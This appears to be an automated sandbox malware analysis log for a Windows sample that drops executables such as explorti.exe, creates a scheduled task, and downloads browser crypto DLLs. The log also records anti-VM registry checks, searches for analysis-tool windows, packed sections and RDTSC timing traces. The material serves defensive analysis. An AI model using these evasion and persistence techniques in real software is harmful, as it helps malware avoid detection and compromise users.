Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: file.exe Static file information: File size 2544640 > 1048576
Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x22a000
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.4b0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Unpacked PE file: 5.2.JJEGIJEGDB.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 8.2.explorti.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 9.2.explorti.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C65C410
Source: initial sample Static PE information: section where entry point is pointing to: .data
Source: explorti.exe.5.dr Static PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
Source: JJEGIJEGDB.exe.0.dr Static PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
Source: file.exe Static PE information: real checksum: 0x0 should be: 0x27638e
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: ohmzqnep
Source: amadka[1].exe.0.dr Static PE information: section name: ebipawoj
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name:
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: .idata
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name:
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: ohmzqnep
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: ebipawoj
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: ohmzqnep
Source: explorti.exe.5.dr Static PE information: section name: ebipawoj
Source: explorti.exe.5.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B536 push ecx; ret 0_2_6C62B549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001AD82C push ecx; ret 12_2_001AD83F
Source: file.exe Static PE information: section name: entropy: 7.995466725480933
Source: file.exe Static PE information: section name: entropy: 7.977842582826075
Source: file.exe Static PE information: section name: entropy: 7.9508605124369
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.987398323235003
Source: amadka[1].exe.0.dr Static PE information: section name: ohmzqnep entropy: 7.952574384600115
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: entropy: 7.987398323235003
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: ohmzqnep entropy: 7.952574384600115
Source: explorti.exe.5.dr Static PE information: section name: entropy: 7.987398323235003
Source: explorti.exe.5.dr Static PE information: section name: ohmzqnep entropy: 7.952574384600115
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6555F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C6555F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: A7EE45 second address: A7E700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F34D94219DCh 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007F34D94219DEh 0x00000012 push dword ptr [ebp+122D0019h] 0x00000018 or dword ptr [ebp+122D1870h], ebx 0x0000001e call dword ptr [ebp+122D265Bh] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D1870h], esi 0x0000002b xor eax, eax 0x0000002d sub dword ptr [ebp+122D2154h], ebx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 jmp 00007F34D94219E9h 0x0000003c mov dword ptr [ebp+122D33DDh], eax 0x00000042 pushad 0x00000043 xor dl, FFFFFFB5h 0x00000046 jmp 00007F34D94219DCh 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2154h], edx 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jne 00007F34D94219DCh 0x00000061 lodsw 0x00000063 je 00007F34D94219DDh 0x00000069 jnc 00007F34D94219D7h 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 pushad 0x00000074 add dword ptr [ebp+122D2154h], eax 0x0000007a adc ch, FFFFFFBCh 0x0000007d popad 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 jmp 00007F34D94219E3h 0x00000089 push eax 0x0000008a jng 00007F34D94219E8h 0x00000090 push eax 0x00000091 push edx 0x00000092 je 00007F34D94219D6h 0x00000098 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEB0F9 second address: BEB0FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEB639 second address: BEB646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F34D94219D8h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEB804 second address: BEB80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEB933 second address: BEB93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEB93D second address: BEB941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEDF7F second address: BEE00A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F34D94219DAh 0x00000010 jnp 00007F34D94219D6h 0x00000016 popad 0x00000017 popad 0x00000018 add dword ptr [esp], 4985A972h 0x0000001f sbb edi, 127BE68Ch 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D17BBh], edi 0x0000002c cmc 0x0000002d popad 0x0000002e push 00000003h 0x00000030 add dword ptr [ebp+122D1870h], ecx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F34D94219D8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jmp 00007F34D94219E2h 0x00000057 push 00000003h 0x00000059 add esi, dword ptr [ebp+122D267Eh] 0x0000005f push 8A6C0093h 0x00000064 push ecx 0x00000065 pushad 0x00000066 jns 00007F34D94219D6h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE106 second address: BEE10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE10A second address: BEE10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE10F second address: BEE11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE11F second address: BEE135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F34D94219DEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE135 second address: BEE213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F34D8F44CC0h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F34D8F44CC0h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007F34D8F44CC0h 0x0000001f pop eax 0x00000020 call 00007F34D8F44CC5h 0x00000025 mov esi, dword ptr [ebp+122D360Dh] 0x0000002b pop esi 0x0000002c push 00000003h 0x0000002e mov edi, dword ptr [ebp+122D1F3Dh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 mov dword ptr [ebp+122D1BF6h], ebx 0x0000003d pop edx 0x0000003e push 00000003h 0x00000040 jnp 00007F34D8F44CB9h 0x00000046 movzx edx, cx 0x00000049 call 00007F34D8F44CB9h 0x0000004e push edi 0x0000004f jmp 00007F34D8F44CBEh 0x00000054 pop edi 0x00000055 push eax 0x00000056 push esi 0x00000057 jmp 00007F34D8F44CBDh 0x0000005c pop esi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 jnp 00007F34D8F44CC2h 0x00000067 jp 00007F34D8F44CBCh 0x0000006d mov eax, dword ptr [eax] 0x0000006f jmp 00007F34D8F44CC6h 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 push ebx 0x00000079 push eax 0x0000007a push edx 0x0000007b jp 00007F34D8F44CB6h 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE213 second address: BEE272 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F34D94219D8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007F34D94219DDh 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D2383h], ebx 0x0000002e mov dword ptr [ebp+122D22BAh], edi 0x00000034 popad 0x00000035 pop edx 0x00000036 lea ebx, dword ptr [ebp+12442E53h] 0x0000003c or dword ptr [ebp+122D2097h], edi 0x00000042 push eax 0x00000043 push ebx 0x00000044 jc 00007F34D94219DCh 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE36C second address: BEE385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE385 second address: BEE38F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE38F second address: BEE40E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F34D8F44CC5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F34D8F44CB8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1F1Dh], ebx 0x0000002b push 00000003h 0x0000002d mov di, si 0x00000030 push 00000000h 0x00000032 call 00007F34D8F44CBFh 0x00000037 mov edi, dword ptr [ebp+122D33E9h] 0x0000003d pop esi 0x0000003e mov dword ptr [ebp+122D237Eh], ebx 0x00000044 push 00000003h 0x00000046 mov esi, dword ptr [ebp+122D17C0h] 0x0000004c mov esi, dword ptr [ebp+122D3571h] 0x00000052 push A68CC8A4h 0x00000057 push edx 0x00000058 pushad 0x00000059 jno 00007F34D8F44CB6h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE40E second address: BEE443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 668CC8A4h 0x0000000d mov dword ptr [ebp+122D23ACh], edi 0x00000013 lea ebx, dword ptr [ebp+12442E5Eh] 0x00000019 mov dx, 5C8Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F34D94219E1h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE443 second address: BEE45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB38 second address: BDEB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D94219D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB42 second address: BDEB48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB48 second address: BDEB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB50 second address: BDEB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB54 second address: BDEB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F34D94219D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007F34D94219D6h 0x00000017 jmp 00007F34D94219DBh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB77 second address: BDEB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C61C second address: C0C620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C620 second address: C0C626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
